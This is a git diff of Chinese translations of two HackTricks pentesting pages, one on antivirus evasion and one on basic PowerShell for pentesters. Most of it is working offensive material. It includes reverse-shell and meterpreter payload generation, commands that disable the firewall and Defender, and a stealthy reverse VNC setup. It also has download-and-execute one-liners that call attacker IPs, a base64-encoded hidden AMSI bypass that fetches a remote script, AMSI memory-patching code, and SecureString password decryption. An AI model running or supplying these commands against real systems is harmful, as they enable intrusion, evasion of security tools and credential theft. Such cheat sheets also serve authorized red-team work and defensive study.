+[**PackMyPayload**](https://github.com/mgeeky/PackMyPayload/) 是一个将有效载荷打包到输出容器中的工具,以规避网络标记。
示例用法:
```powershell
@@ -282,103 +288,105 @@ Adding file: /TotallyLegitApp.exe
[+] Generated file written to (size: 3420160): container.iso
```
-以下是使用[PackMyPayload](https://github.com/mgeeky/PackMyPayload/)将有效负载打包在ISO文件中绕过SmartScreen的演示。
+这里是一个演示,通过使用 [PackMyPayload](https://github.com/mgeeky/PackMyPayload/) 将有效载荷打包在 ISO 文件中来绕过 SmartScreen。
-## C#程序集反射
+## C# 程序集反射
-将C#二进制文件加载到内存中已经有一段时间了,这仍然是一个非常好的方法,可以在不被杀毒软件发现的情况下运行您的后渗透工具。
+在内存中加载 C# 二进制文件已经被知道了一段时间,这仍然是运行后渗透工具而不被 AV 捕获的非常好方法。
-由于有效负载将直接加载到内存中而不会触及磁盘,我们只需要担心为整个过程打补丁AMS。大多数C2框架(如sliver、Covenant、metasploit、CobaltStrike、Havoc等)已经提供了直接在内存中执行C#程序集的能力,但有不同的执行方式:
+由于有效载荷将直接加载到内存中而不接触磁盘,我们只需担心在整个过程中修补 AMSI。
-* **分叉和运行**
+大多数 C2 框架(sliver、Covenant、metasploit、CobaltStrike、Havoc 等)已经提供了直接在内存中执行 C# 程序集的能力,但有不同的方法来做到这一点:
-它涉及**生成一个新的牺牲进程**,将您的后渗透恶意代码注入到该新进程中,执行您的恶意代码,完成后终止新进程。这种方法的好处和缺点都有。分叉和运行方法的好处在于执行发生在我们的Beacon植入进程**之外**。这意味着如果我们的后渗透操作出了问题或被发现,我们的**植入物存活的机会**要**大得多**。缺点是您有**更大的机会**被**行为检测**发现。
+* **Fork\&Run**
+
+这涉及到 **生成一个新的牺牲进程**,将你的后渗透恶意代码注入到那个新进程中,执行你的恶意代码,完成后杀死新进程。这有其优点和缺点。Fork 和 run 方法的好处在于执行发生在我们的 Beacon 植入进程 **之外**。这意味着如果我们的后渗透操作出现问题或被捕获,我们的 **植入物存活的机会更大**。缺点是你被 **行为检测** 捕获的 **机会更大**。
.png)
-* **内联**
+* **Inline**
-这是将后渗透恶意代码**注入到自己的进程**中。这样,您可以避免创建新进程并使其被杀毒软件扫描,但缺点是如果有效负载执行出现问题,您的Beacon**很可能会丢失**,因为它可能会崩溃。
+这是将后渗透恶意代码 **注入到其自身进程中**。这样,你可以避免创建新进程并让其被 AV 扫描,但缺点是如果你的有效载荷执行出现问题,**失去你的 beacon 的机会更大**,因为它可能崩溃。
.png)
{% hint style="info" %}
-如果您想了解更多关于C#程序集加载的信息,请查看这篇文章[https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/](https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/)以及他们的InlineExecute-Assembly BOF ([https://github.com/xforcered/InlineExecute-Assembly](https://github.com/xforcered/InlineExecute-Assembly))
+如果你想了解更多关于 C# 程序集加载的信息,请查看这篇文章 [https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/](https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/) 和他们的 InlineExecute-Assembly BOF ([https://github.com/xforcered/InlineExecute-Assembly](https://github.com/xforcered/InlineExecute-Assembly))
{% endhint %}
-您还可以**从PowerShell**加载C#程序集,请查看[Invoke-SharpLoader](https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader)和[S3cur3th1sSh1t的视频](https://www.youtube.com/watch?v=oe11Q-3Akuk)。
+你还可以 **从 PowerShell 加载 C# 程序集**,查看 [Invoke-SharpLoader](https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader) 和 [S3cur3th1sSh1t 的视频](https://www.youtube.com/watch?v=oe11Q-3Akuk)。
## 使用其他编程语言
-如[**https://github.com/deeexcee-io/LOI-Bins**](https://github.com/deeexcee-io/LOI-Bins)中提出的,通过让受损机器访问**攻击者控制的SMB共享上安装的解释器环境**,可以使用其他语言执行恶意代码。
+正如在 [**https://github.com/deeexcee-io/LOI-Bins**](https://github.com/deeexcee-io/LOI-Bins) 中提出的,可以通过让被攻陷的机器访问 **攻击者控制的 SMB 共享上的解释器环境** 来使用其他语言执行恶意代码。
-通过允许访问解释器二进制文件和SMB共享上的环境,您可以在受损机器的内存中**执行这些语言中的任意代码**。
+通过允许访问 SMB 共享上的解释器二进制文件和环境,你可以 **在被攻陷机器的内存中执行这些语言的任意代码**。
-该存储库指出:Defender仍然会扫描脚本,但通过利用Go、Java、PHP等,我们有**更多灵活性来绕过静态签名**。在这些语言中使用随机未混淆的反向外壳脚本进行测试已被证明是成功的。
+该仓库指出:Defender 仍然会扫描脚本,但通过利用 Go、Java、PHP 等,我们有 **更多的灵活性来绕过静态签名**。使用这些语言中的随机未混淆反向 shell 脚本进行测试已证明成功。
-## 高级逃避
+## 高级规避
-逃避是一个非常复杂的主题,有时您必须考虑一个系统中许多不同来源的遥测数据,因此在成熟的环境中完全不被检测到几乎是不可能的。
+规避是一个非常复杂的话题,有时你必须考虑一个系统中许多不同的遥测来源,因此在成熟环境中完全不被检测几乎是不可能的。
-您对抗的每个环境都有其优势和劣势。
+你所面对的每个环境都有其自身的优缺点。
-我强烈建议您观看[@ATTL4S](https://twitter.com/DaniLJ94)的这个演讲,以了解更多关于高级逃避技术的入门。
+我强烈建议你观看 [@ATTL4S](https://twitter.com/DaniLJ94) 的这场演讲,以了解更多高级规避技术。
{% embed url="https://vimeo.com/502507556?embedded=true&owner=32913914&source=vimeo_logo" %}
-这也是[@mariuszbit](https://twitter.com/mariuszbit)关于深度逃避的另一个很棒的演讲。
+这也是 [@mariuszbit](https://twitter.com/mariuszbit) 关于深度规避的另一场精彩演讲。
{% embed url="https://www.youtube.com/watch?v=IbA7Ung39o4" %}
## **旧技术**
-### **检查Defender发现的恶意部分**
+### **检查 Defender 发现的恶意部分**
-您可以使用[**ThreatCheck**](https://github.com/rasta-mouse/ThreatCheck),它会**删除二进制文件的部分**,直到找出Defender认为是恶意的部分并将其拆分给您。\
-另一个执行**相同操作的工具是**[**avred**](https://github.com/dobin/avred),提供在[**https://avred.r00ted.ch/**](https://avred.r00ted.ch/)上的开放网络服务。
+你可以使用 [**ThreatCheck**](https://github.com/rasta-mouse/ThreatCheck),它将 **移除二进制文件的部分**,直到 **找出 Defender** 发现的恶意部分并将其分离给你。\
+另一个做 **同样事情的工具是** [**avred**](https://github.com/dobin/avred),它提供了一个开放的网络服务,地址为 [**https://avred.r00ted.ch/**](https://avred.r00ted.ch/)
-### **Telnet服务器**
+### **Telnet 服务器**
-直到Windows10,所有Windows都带有一个**Telnet服务器**,您可以安装它(作为管理员)执行:
+直到 Windows 10,所有 Windows 都附带一个 **Telnet 服务器**,你可以通过以下方式安装(作为管理员):
```bash
pkgmgr /iu:"TelnetServer" /quiet
```
-让它在系统启动时**启动**并立即**运行**:
+使其在系统启动时**启动**并**立即运行**:
```bash
sc config TlntSVR start= auto obj= localsystem
```
-**更改 telnet 端口**(隐蔽)并禁用防火墙:
+**更改telnet端口** (隐蔽) 并禁用防火墙:
```
tlntadmn config port=80
netsh advfirewall set allprofiles state off
```
### UltraVNC
-从以下链接下载:[http://www.uvnc.com/downloads/ultravnc.html](http://www.uvnc.com/downloads/ultravnc.html)(你需要下载二进制文件,而不是安装程序)
+从这里下载: [http://www.uvnc.com/downloads/ultravnc.html](http://www.uvnc.com/downloads/ultravnc.html)(你需要的是二进制下载,而不是安装程序)
-**在主机上**:执行 _**winvnc.exe**_ 并配置服务器:
+**在主机上**: 执行 _**winvnc.exe**_ 并配置服务器:
* 启用选项 _Disable TrayIcon_
* 在 _VNC Password_ 中设置密码
* 在 _View-Only Password_ 中设置密码
-然后,将二进制文件 _**winvnc.exe**_ 和**新创建的**文件 _**UltraVNC.ini**_ 移动到**受害者**内
+然后,将二进制文件 _**winvnc.exe**_ 和 **新创建的** 文件 _**UltraVNC.ini**_ 移动到 **受害者** 机器中
#### **反向连接**
-**攻击者**应该在他的**主机**内执行二进制文件 `vncviewer.exe -listen 5900`,这样它就会**准备好**接收反向**VNC连接**。然后,在**受害者**内:启动 winvnc 守护程序 `winvnc.exe -run` 并运行 `winwnc.exe [-autoreconnect] -connect ::5900`
+**攻击者**应在其 **主机** 中执行二进制文件 `vncviewer.exe -listen 5900`,以便 **准备** 捕获反向 **VNC 连接**。然后,在 **受害者** 机器中: 启动 winvnc 守护进程 `winvnc.exe -run` 并运行 `winwnc.exe [-autoreconnect] -connect ::5900`
-**警告:**为了保持隐蔽,你必须避免做一些事情
+**警告:** 为了保持隐蔽性,你必须避免以下几件事
-* 如果 `winvnc` 已经在运行,请不要启动它,否则会触发[弹出窗口](https://i.imgur.com/1SROTTl.png)。使用 `tasklist | findstr winvnc` 检查是否正在运行
-* 不要在没有 `UltraVNC.ini` 的同一目录中启动 `winvnc`,否则会导致[配置窗口](https://i.imgur.com/rfMQWcf.png)打开
-* 不要运行 `winvnc -h` 获取帮助,否则会触发[弹出窗口](https://i.imgur.com/oc18wcu.png)
+* 如果 `winvnc` 已经在运行,不要再次启动它,否则会触发一个 [弹出窗口](https://i.imgur.com/1SROTTl.png)。使用 `tasklist | findstr winvnc` 检查它是否在运行
+* 如果没有 `UltraVNC.ini` 在同一目录中,不要启动 `winvnc`,否则会导致 [配置窗口](https://i.imgur.com/rfMQWcf.png) 打开
+* 不要运行 `winvnc -h` 获取帮助,否则会触发一个 [弹出窗口](https://i.imgur.com/oc18wcu.png)
### GreatSCT
-从以下链接下载:[https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT)
+从这里下载: [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT)
```
git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT/setup/
@@ -386,7 +394,7 @@ cd GreatSCT/setup/
cd ..
./GreatSCT.py
```
-在GreatSCT内部:
+在 GreatSCT 内部:
```
use 1
list #Listing available payloads
@@ -396,23 +404,23 @@ sel lport 4444
generate #payload is the default name
#This will generate a meterpreter xml and a rcc file for msfconsole
```
-现在使用 `msfconsole -r file.rc` 启动**监听器**,然后执行以下**xml payload**:
+现在 **启动监听器** 使用 `msfconsole -r file.rc` 并 **执行** **xml 负载** 使用:
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
```
-**当前的防御程序会非常快速地终止该进程。**
+**当前的防御者会非常快速地终止进程。**
### 编译我们自己的反向 shell
-https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
+https://medium.com/@Bank\_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
#### 第一个 C# 反向 shell
-使用以下命令进行编译:
+使用以下命令编译:
```
c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt
```
-使用方法:
+使用它与:
```
back.exe
```
@@ -489,14 +497,10 @@ catch (Exception err) { }
}
}
```
-### 使用编译器的C#
+### C# 使用编译器
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt
```
-[REV.txt: https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066](https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066)
-
-[REV.shell: https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639](https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639)
-
自动下载和执行:
```csharp
64bit:
@@ -507,7 +511,7 @@ powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.g
```
{% embed url="https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f" %}
-C#混淆器列表: [https://github.com/NotPrab/.NET-Obfuscator](https://github.com/NotPrab/.NET-Obfuscator)
+C# 混淆器列表: [https://github.com/NotPrab/.NET-Obfuscator](https://github.com/NotPrab/.NET-Obfuscator)
### C++
```
@@ -522,7 +526,7 @@ i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sec
* [http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html](http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html)
* [http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/](http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/)
-### 使用Python构建注入器示例:
+### 使用 Python 构建注入器示例:
* [https://github.com/cocomelonc/peekaboo](https://github.com/cocomelonc/peekaboo)
@@ -555,16 +559,17 @@ https://github.com/praetorian-code/vulcan
* [https://github.com/persianhydra/Xeexe-TopAntivirusEvasion](https://github.com/persianhydra/Xeexe-TopAntivirusEvasion)
+{% hint style="success" %}
+学习与实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习与实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-从零开始学习AWS黑客技术 htARTE(HackTricks AWS红队专家)!
+支持 HackTricks
-支持HackTricks的其他方式:
-
-* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
-* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
+{% endhint %}
diff --git a/windows-hardening/basic-powershell-for-pentesters/README.md b/windows-hardening/basic-powershell-for-pentesters/README.md
index f55eea51e..2615aec9c 100644
--- a/windows-hardening/basic-powershell-for-pentesters/README.md
+++ b/windows-hardening/basic-powershell-for-pentesters/README.md
@@ -1,25 +1,26 @@
-# 基础 PowerShell for Pentesters
+# Basic PowerShell for Pentesters
+
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术:[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家)!
+支持 HackTricks
-支持 HackTricks 的其他方式:
-
-* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
-* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
-* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
-* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
+{% endhint %}
## 默认 PowerShell 位置
```powershell
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
```
-## 开始的基本 PowerShell 命令
+## 基本的 PS 命令入门
```powershell
Get-Help * #List everything loaded
Get-Help process #List everything containing "process"
@@ -28,7 +29,7 @@ Get-Help Get-Item -Examples #List examples
Import-Module
Get-Command -Module
```
-## 下载 & 执行
+## 下载与执行
```powershell
g
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
@@ -42,11 +43,11 @@ $wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr
#host a text record with your payload at one of your (unburned) domains and do this:
powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
```
-### 使用 AMSI Bypass 后台下载并执行
+### 下载并在后台执行,绕过 AMSI
```powershell
Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA="
```
-### 在 Linux 中使用 b64
+### 使用 Linux 的 b64
```powershell
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
powershell -nop -enc
@@ -58,28 +59,20 @@ powershell -nop -enc
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
```
### Invoke-WebRequest
-
-### 调用-网络请求
```powershell
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
```
-### Wget
-
### Wget
```powershell
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
```
### BitsTransfer
-
-### 位传输
```powershell
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
# OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
```
-## Base64 Kali & EncodedCommand
-
## Base64 Kali & EncodedCommand
```powershell
kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
@@ -91,7 +84,7 @@ PS> powershell -EncodedCommand
## [AppLocker 策略](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/basic-powershell-for-pentesters/broken-reference/README.md)
-## 启用 WinRM(远程 PowerShell)
+## 启用 WinRM (远程 PS)
```powershell
enable-psremoting -force #This enables winrm
@@ -107,7 +100,7 @@ $_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm
```
## 禁用 Defender
-{% 代码 溢出="换行" %}
+{% code overflow="wrap" %}
```powershell
# Check status
Get-MpComputerStatus
@@ -137,13 +130,13 @@ ValueData : 0
```
{% endcode %}
-### AMSI bypass
+### AMSI 绕过
-**`amsi.dll`** 被**加载**到您的进程中,并具有任何应用程序与之交互所需的**导出函数**。由于它加载到您**控制的进程**的内存空间中,您可以通过**覆盖内存中的指令**来改变其行为。使其无法检测任何内容。
+**`amsi.dll`** 被 **加载** 到你的进程中,并具有任何应用程序交互所需的 **导出**。由于它被加载到你 **控制** 的进程的内存空间中,你可以通过 **覆盖内存中的指令** 来改变其行为。使其无法检测任何内容。
-因此,您的 AMSI 绕过的目标是**覆盖内存中该 DLL 的指令,使检测变得无效**。
+因此,AMSI 绕过的目标是 **在内存中覆盖该 DLL 的指令,以使检测无效**。
-**AMSI 绕过生成器**网页: [**https://amsi.fail/**](https://amsi.fail/)
+**AMSI 绕过生成器** 网页: [**https://amsi.fail/**](https://amsi.fail/)
```powershell
# A Method
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
@@ -188,37 +181,37 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
https://slaeryan.github.io/posts/falcon-zero-alpha.html
```
-### AMSI绕过2 - 托管API调用挂钩
+### AMSI Bypass 2 - Managed API Call Hooking
-查看[**此帖以获取详细信息和代码**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/)。介绍:
+查看[**此帖子以获取详细信息和代码**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/)。介绍:
-这种新技术依赖于对.NET方法的API调用挂钩。事实证明,.NET方法需要在内存中编译为本机机器指令,最终看起来非常类似于本机方法。这些编译后的方法可以被挂钩以改变程序的控制流。
+这种新技术依赖于对 .NET 方法的 API 调用钩子。事实证明,.NET 方法需要被编译为内存中的本机机器指令,这些指令看起来与本机方法非常相似。这些编译后的方法可以被钩住,以改变程序的控制流。
-执行.NET方法的API调用挂钩步骤如下:
+执行 .NET 方法的 API 调用钩子的步骤如下:
-1. 确定要挂钩的目标方法
+1. 确定要钩住的目标方法
2. 定义一个与目标具有相同函数原型的方法
3. 使用反射查找方法
-4. 确保每个方法都已编译
-5. 找到内存中每个方法的位置
-6. 覆盖目标方法,使其指向我们恶意方法的指令
+4. 确保每个方法已被编译
+5. 找到每个方法在内存中的位置
+6. 用指向我们恶意方法的指令覆盖目标方法
-### AMSI绕过3 - SeDebug特权
+### AMSI Bypass 3 - SeDebug Privilege
-[**按照此指南和代码**](https://github.com/MzHmO/DebugAmsi),您可以看到具有足够特权以调试进程的情况下,可以生成一个powershell.exe进程,对其进行调试,监视其何时加载`amsi.dll`并将其禁用。
+[**按照此指南和代码**](https://github.com/MzHmO/DebugAmsi),您可以看到如何通过足够的权限调试进程,生成一个 powershell.exe 进程,调试它,监控何时加载 `amsi.dll` 并禁用它。
-### AMSI绕过 - 更多资源
+### AMSI Bypass - More Resources
* [S3cur3Th1sSh1t/Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)
-* [2023年在Windows 11上绕过AMSI](https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6) [Github](https://github.com/senzee1984/Amsi\_Bypass\_In\_2023)
+* [2023年在Windows 11上绕过Amsi](https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6) [Github](https://github.com/senzee1984/Amsi\_Bypass\_In\_2023)
-## PS历史
+## PS-History
```powershell
Get-Content C:\Users\\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
```
-## 查找更新的文件
+## 查找较新的文件
-选项:`CreationTime`(创建时间)、`CreationTimeUtc`(创建时间 UTC)、`LastAccessTime`(最后访问时间)、`LastAccessTimeUtc`(最后访问时间 UTC)、`LastWriteTime`(最后写入时间)、`LastWriteTimeUtc`(最后写入时间 UTC)
+选项 : `CreationTime`, `CreationTimeUtc`, `LastAccessTime`, `LastAccessTimeUtc`, `LastWriteTime`, `LastWriteTimeUtc`
```powershell
# LastAccessTime:
(gci C:\ -r | sort -Descending LastAccessTime | select -first 100) | Select-Object -Property LastAccessTime,FullName
@@ -230,7 +223,7 @@ Get-Content C:\Users\\AppData\Roaming\Microsoft\Windows\Powershell\PSR
```powershell
Get-Acl -Path "C:\Program Files\Vuln Services" | fl
```
-## 操作系统版本和热补丁
+## 操作系统版本和补丁更新
```powershell
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
@@ -241,7 +234,7 @@ Get-Hotfix -description "Security update" #List only "Security Update" patches
Get-ChildItem Env: | ft Key,Value -AutoSize #get all values
$env:UserName @Get UserName value
```
-## 其他已连接的驱动器
+## 其他连接的驱动器
```powershell
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
```
@@ -253,7 +246,7 @@ $rb.Items()
```
[https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/](https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/)
-## 域侦察
+## 域侦查
{% content-ref url="powerview.md" %}
[powerview.md](powerview.md)
@@ -264,7 +257,7 @@ $rb.Items()
Get-LocalUser | ft Name,Enabled,Description,LastLogon
Get-ChildItem C:\Users -Force | select Name
```
-## 将安全字符串转换为明文
+## 安全字符串到明文
```powershell
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
$user = "HTB\Tom"
@@ -276,7 +269,7 @@ Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
```
-或者直接从 XML 解析:
+或直接解析 XML:
```powershell
$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *
@@ -285,8 +278,6 @@ Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
```
-## SUDO
-
## SUDO
```powershell
#CREATE A CREDENTIAL OBJECT
@@ -309,7 +300,7 @@ $secpasswd = ConvertTo-SecureString "" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd)
$computer = ""
```
-## 用户组
+## 组
```powershell
Get-LocalGroup | ft Name #All groups
Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators
@@ -326,7 +317,7 @@ Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
```
Get-Service
```
-## 从安全字符串中获取密码
+## 从安全字符串获取密码
```powershell
$pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file
$cred=new-object system.management.automation.pscredential("administrator", $pw)
@@ -378,8 +369,6 @@ Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Tab
```powershell
route print
```
-### ARP
-
### ARP
```powershell
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
@@ -388,8 +377,6 @@ Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,Stat
```powershell
Get-Content C:\WINDOWS\System32\drivers\etc\hosts
```
-### Ping
-
### Ping
```powershell
$ping = New-Object System.Net.Networkinformation.Ping
@@ -401,25 +388,32 @@ Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
```
## **将SDDL字符串转换为可读格式**
```powershell
-```plaintext
-PS C:\> ConvertFrom-SddlString "O:BAG:BAD:AI(D;;DC;;;WD)(OA;CI;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-3842939050-3880317879-2865463114-522)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-498)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;CI;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-3842939050-3880317879-28654631